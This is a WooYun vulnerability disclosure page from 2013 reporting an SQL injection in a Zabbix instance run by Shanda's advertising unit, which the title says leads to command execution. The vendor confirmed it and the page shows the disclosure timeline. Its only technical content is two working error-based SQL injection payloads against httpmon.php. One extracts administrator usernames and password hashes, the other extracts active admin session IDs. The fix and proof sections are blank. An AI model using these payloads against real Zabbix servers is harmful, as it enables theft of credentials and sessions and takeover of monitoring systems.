WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-040304

漏洞标题：盛大广告ZabbixSQL注入导致命令执行

相关厂商：盛大网络

漏洞作者： 猪是念着倒V

提交时间：2013-10-19 16:26

修复时间：2013-10-21 17:28

公开时间：2013-10-21 17:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2013-10-19： 细节已通知厂商并且等待厂商处理中
2013-10-20： 厂商已经确认，细节仅向厂商公开
2013-10-21： 厂商提前公开漏洞，细节向公众公开

简要描述：

盛大广告ZabbixSQL注入导致命令执行

详细说明：

httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid=1 LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪是念着倒V@乌云

漏洞回应

漏洞评价：

评论